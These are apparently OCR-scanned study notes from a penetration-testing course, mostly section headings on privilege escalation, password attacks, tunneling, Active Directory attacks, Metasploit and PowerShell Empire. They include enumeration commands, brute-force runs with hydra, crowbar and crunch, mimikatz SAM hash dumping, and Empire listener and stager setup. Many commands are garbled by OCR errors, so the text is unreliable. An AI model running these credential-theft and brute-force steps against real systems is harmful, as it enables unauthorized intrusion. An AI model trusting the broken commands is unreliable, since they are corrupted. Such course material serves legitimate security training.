C:\Users\student>systeminfo I findstr /B /C:110s Name" /C:110s Version" /C:"System Type"
student@debian:~$ cat /etc/issue
18.1.1.4 Enumerating Running Processes and Services
C:\Users\student>tasklist /SVC
18.1.1.5 Enumerating Networking Information
analysis of the target host is to review available network interfaces, routes, and
open ports.
windows:
C:\Users\student>ipconfig /all
C:\Users\student>route print
Finally, we can use netstat to view the actlve network connections. Specifying the a flag will display all actfve TCP connections, then flag allows us to dlsplay the address and port number in a numerical form, and the o flag will display the owner PIO of each connection.
C:\Users\student>netstat -ano
linux:
student@debian:-$ ip a
student@debian:-$ /sbin/route
we can display active network connections and listening ports with either netstat460 or ss,461 bothofwhichacceptthesamearguments.
For example, we can list all connections with -a, avoid hostname resolution (which may stall the command execution) with -n, and list the process name the connection belongs to with -p. We can combinetheargumentsandsimplyrunss -anp:
student@debian:~$ ss -anp
18.1.1.6 Enumerating Firewall Status and Rules
C:\Users\student>netsh advfirewa11 show currentprofile
look at the firewall rules
C:\Users\student>netsh advfirewall firewall show rule name=all
18.1.1.7 Enumerating Scheduled Tasks
c:\Users\student>schtasks /query /fo LIST /v
student@debian:-$ ls -lah /etc/cron*
student@debian:~$cat / etc/ crontab
18.1.1.8 Enumerating Installed Applications and Patch Levels
c:\Users\student>wmic product get name, version, vendor
wmic can also be used to list system-wide updates by querying the Win32-QuickFixEngineering (qfe)472 WMI class.
c:\Users\student>wmic qfe get Caption, Description, HotFixID, InstaltedOn
student@debian:~$ dpkg -l
18.1.1.9 Enumerating Readable/Writable Files and Directories
we will enumerate the Program Files directory in search of any file or directory that allows the Everyone476 group write permissions.
We will use -u to suppress errors, -w to search for write access permissions, and -s to perform a recursive search. The additional options are also worth exploring as this tool is quite useful.
c:\Tools\privilege_escalation\SysinternalsSuite>accesschk.exe -uws "Everyone" "C:\Prog ram Files"
C:\Tools\privilege_escalation\Sysinternal sSuite>Get-Childitem "C:\Program Files'' -R ecurse I Get-ACL I ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}
linux:
student@debian:-$ find / -writable -type d 2>/dev/null
18.1.1.10 Enumerating Unmounted Disks
c:\Users\student>mountvol
student@debian:-$ cat /etc/fstab
student@debian:-$ /bin/tsblk
18.1.1.11 Enumerating Device Drivers and Kernel Modules
18.1.1.12 Enumerating Binaries That AutoElevate
on Windows systems, we should check the status of the Always(nsta//E/evateci488 registry setting. If this key is enabled (set to 7) in either HKEY_CURRENT_USER or HKEY_LOCALMACHINE, any user can run Windows Installer packages with elevated privileges.
c:\Users\student>reg query HKEY_CURRENT_USER\Software\Poticies\Microsoft\Windows\Insta
Her
linux:
We can use the find command to search for SUID-marked binaries. In this case, we are starting our search at the root directory(/), looking for files (-type f) with the SUID bit set, (-perm -u=s) and discarding all error messages (2>/dev/null.):
student@debian:-$ find / -perm -u=s -type f 2>/dev/null
18.1.2 Automated Enumeration
student@debian:~$ ./unix-privesc-check

18.2 Windows Privilege Escalation Examples
18.2.1 Understanding Windows Privileges and Integrity Levels
From Windows Vista onward, processes run on four integrity levels:
System integrity process: SYSTEM rights
High integrity process: administrative rights
Medium integrity process: standard user rights
Low integrity process: very restricted rights often used in sandboxed processes
18.2.2 Introduction to User Account Control (UAC)
c:\Users\admin>whoami /groups
C:\Users\admin> net user admin Ev!tpass
C:\Users\admin>powershett.exe Start-Process cmd.exe -verb runAs
In order to change the admin user's password, we must switch to a high integrity level even if we are logged in with an administrative user. In our example, one way to do this is through powershell.exe with the Start-Process505 cmdlet specifying the HRun as administrator· option:
C:\Users\admin>powershett.exe Start-Process cmd.exe -verb runAs
18.2.3 User Account Control (UAC) Bypass: fodhelper.exe Case Study
18.2.4 Insecure File Permissions: Serviio Case Study
18.2.5 Leveraging Unquoted Service Paths(利用未引用的服务路径)
18.2.6 Windows Kernel Vulnerabilities: USBPcap Case Study
kali@kali:~# searchsploit USBPcap
18.2.6.1 Compiling CIC++ Code on Windows
18.3 Linux Privilege Escalation Examples
18.3.1 Understanding Linux Privileges
18.3.2 Insecure File Permissions: Cron Case Study
18.3.3 Insecure File Permissions: /etc/passwd Case Study
18.3.4 Kernel Vulnerabilities: CVE-2017-1000112 Case Study
18.3.4.1 Compiling CIC++ Code on Linux

19. Password Attacks
19.1 Wordlists
19.1.1 Standard Wordlists
John the Ripper

19.2 Brute Force Wordlists
Crunch included with Kali Linux, is a powerful wordlist generator
kali@kali: ~$ crunch 8 8 -t ,@@AA9~%%
consume a massive 160 GB of disk space
We can also define a character set with crunch. For example, we can create a brute force wordlist
accounting for passwords between four and six characters in length (4 6), containing only the
characters 0-9 and A-F (8123456789ABCDEF), and we will write the output to a file (-o
crunch.txt):
kali@kali:~$ crunch 4 6 0123456789ABCDEF -o crunch.txt

19.3 Common Network Service Attack Methods
19.3.1 HTTP htaccess Attack with Medusa
19.3.2 Remote Desktop Protocol Attack with Crowbar
kali @kali:~$ sudo apt instatt crowbar
To invoke crowbar, we will specify the protocol (-b), the target server (-s), a username (-u), a
wordlist (-c), and the number of threads (-n) as shown in Listing 606:
kali@kali:~$ crowbar -b rdp -s 10.11.8.22/ 32 -u admin -c ~/password-fite.txt -n 1
19.3.3 SSH Attack with THC-Hydra
we will attack our Kali VM. We will use the SSH protocol on our local machine
ssh://127.0.0.1, focus on the kali user (-l kal i), and again use the rockyou wordlist (-P):
kali@kali:~$ hydra -t kali -P /usr/share/wordlists/rockyou.txt ssh: //127.0.0.1
19.3.4 HTTP POST Attack with THC-Hydra
kali@kali:~$ hydra 18,11,8,22 http-form-post 11/form/frontpage.php:user=admin&pass="PAS
S":INVALID LOGIN" -l admin -P /usr/share/wordlists/rockyou.txt -vv -f
19.4 Leveraging Password Hashes
19.4.1 Retrieving Password Hashes
mimikatz:from an administrative command prompt. To extract password hashes,
C:\> C:\Too\s\password_attacks\mimikatz.exe
mimikatz # privi\ege::debug
mimikatz # token::elevate
mimikatz # lsadump::sam
19.4.2 Passing the Hash in Windows
19.4.3 Password Cracking
Once we've gained access to password hashes from a target system, we can begin a password
cracking session, running in the background, as we continue our assessment.
kali@kali:~$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=NT
While John the Ripper is a great tool for cracking password hashes, its speed is limited to the power
of the CPUs dedicated to the task. In recent years, Graphic Processing Units (GPUs) have become
incredibly powerful and are, of course, found in every computer with a display。
In this example, we will run hashcat in benchmark mode (-b) on a machine with a GeForce GTX
1080 Ti GPU:
C:\Users\Cracker\hashcat-4.2.l> hashcat64,exe -b

20. Port Redirection and Tunneling
20.1 Port Forwarding
20.1.1 RINETD
we will use a port forwarding tool called rinetd
kali@kali:~$ sudo apt update && sudo apt install rinetd
20.2 SSH Tunneling
20.2.1 SSH Local Port Forwarding
20.2.2 SSH Remote Port Forwarding
20.3 PLINK.exe
20.4 NETSH
20.5 HTTPTunnel-ing Through Deep Packet Inspection

21. Active Directory Attacks
21.1 Active Directory Theory
Active Directory consists of several components. The most important component is the domain controller (DC)
21.2 Active Directory Enumeration
21.2.1 Traditional Approach
C:\Users\Offsec.corp> net user
C:\Users\Offsec.corp> net user /domain
C:\Users\Offsec.corp> net group / domain
21.2.2 A Modern Approach
27.2.3 Resolving Nested Groups
21.2.4 Currently Logged on Users
21.2.5 Enumeration Through Service Principal Names
21.3 Active Directory Authentication
21.3.1 NTLM Authentication
21.3.2 Kerberos Authentication
21.3.3 Cached Credential Storage and Retrieval
21.3.4 Service Account Attacks
21.3.5 Low and Slow Password Guessing

21.4 Active Directory Lateral Movement
21.4.1 Pass the Hash
21.4.2 Overpass the Hash
21.4.3 Pass the Ticket
21.4.4 Distributed Component Object Model

21.5 Active Directory Persistence
21.5.1 Golden Tickets
21.5.2 Domain Controller Synchronization

22. The Metasploit Framework
22.1 Metasploit User Interfaces and Setup
22.1.1 Getting Familiar with MSF Syntax
22.1.2 Metasploit Database Access
22.1.3 Auxiliary Modules
22.2 Exploit Modules
22.2.1 SyncBreeze Enterprise
22.3 Metasploit Payloads
22.3.1 Staged vs Non-Staged Payloads
22.3.2 Meterpreter Payloads
22.3.3 Experimenting with Meterpreter
22.3.4 Executable Payloads
22.3.5 Metasploit Exploit Multi Handler
22.3.6 Client-Side Attacks
22.3.7 Advanced Features and Transports
22.4 Building Our Own MSF Module
22.5 Post-Exploitation with Metasploit
22.5.1 Core Post-Exploitation Features
22.5.2 Migrating Processes
22.5.3 Post-Exploitation Modules
22.5.4 Pivoting with the Metasploit Framework
22.6 Metasploit Automation
23. PowerShell Empire
Empire is a "PowerShell and Python post-exploitation agenr with a heavy focus on client~side exploitation and post-exploitation o f Active Directory (AD) deployments.
23.1 Installation, Setup, and Usage
kali@kali:-$ cd /opt
kali@kali:/opt$ sudo git clone https://github.com/PowerShellEmpire/Empire.git
kali@kali :/opt/Empire$ sudo ./empire
23.1.2 Listeners and Stagers
(Empire) > listeners
(Empire: listeners) > use\istener http
(Empire: listeners) > set Host 10.11.8.4
(Empire: listeners/http) > execute
(Empire: listeners) > usestager
Empire supports stagers for Windows, Linux, and OS X. Windows stagers include support for standard Dlls, HTLM Applications, Microsoft Office macros, and more exotic stagers such as windows/ducky for use with the USB Rubber Ducky
(Empire: listeners) > usestager windows/launcher_bat
Empire: stager/windows/l auncher_bat) > set Listener http
(Empire: stager/windows/launcher_bat) > execute
23.1.3 The Empire Agent

23.2 PowerShell Modules
23.2.1 Situational Awareness(态势感知)
23.2.2 Credentials and Privilege Escalation
23.2.3 Lateral Movement(横向移动)
Once we gain valid user credentials, we can use them to log into additional systems until we reach our objective. This is known as lateral movement.
23.3 Switching Between Empire and Metasploit
The Empire agent supports many features. However, there are often times when we need to use features that are only found in Metasploit. Since we can have both Empire and Metasploit shells on the same compromised host, this is actually quite easy.

24. Assembling the Pieces: Penetration Test Breakdown(渗透测试分解)
24.1 Public Network Enumeration
We will begin by conducting a scan of the external host resolvable through the DNS name sandbox.local. To do this, we will use Nmap with the following command:
kali@kali:~$ sudo nmap -sc -ss -p8-65535 sandbox.tocat
24.2 Targeting the Web Application
24.2.1 Web Application Enumeration
kali@kali:~$ dirb http://sandbox.local
kali@kali:~$ wpscan --url sandbox.local - -enumerate ap,at,cb,dbe
24.2.2 SQL Injection Exploitation
24.2.3 Cracking the Password
24.2.4 Enumerating the Admin Interface
24.2.5 Obtaining a Shell
24.2.6 Post-Exploitation Enumeration
24.2.7 Creating a Stable Pivot Point
24.3 Targeting the Database
24.3.1 Enumeration
24.3.1.1 Application/Service Enumeration
24.3.2 Attempting to Exploit the Database
24.4 Deeper Enumeration of the Web Application Server
24.4.1 More Thorough Post Exploitation
24.4.2 Privilege Escalation
24.4.3 Searching for DB Credentials
24.5 Targeting the Database Again
24.5.1 Exploitation
24.5.2 Post-Exploitation Enumeration
24.5.3 Creating a Stable Reverse Tunnel
24.6 Targeting Poultry(肉鸡)
24.6.1 Enumeration
24.6.1.1 Network Enumeration
24.6.2 Exploitation (Or Just Logging In)
24.6.3 Post-Exploitation Enumeration
24.6.4 Unquoted Search Path Exploitation
24.6.5 Post-Exploitation Enumeration
24.7 Internal Network Enumeration
24.7.1 Reviewing the Results
24.8 Targeting the Jenkins Server
24.8.1 Application Enumeration
24.8.2 Exploiting Jenkins
24.8.3 Post Exploitation Enumeration
24.8.4 Privilege Escalation
24.8.5 Post Exploitation Enumeration
24.9 Targeting the Domain Controller
24.9.1 Exploiting the Domain Controller
With the ability to run commands as the domain administrator user, one way we can get access to the domain controller is by using the PowerShell New-PSSession cmdlet to open a new session against a remote host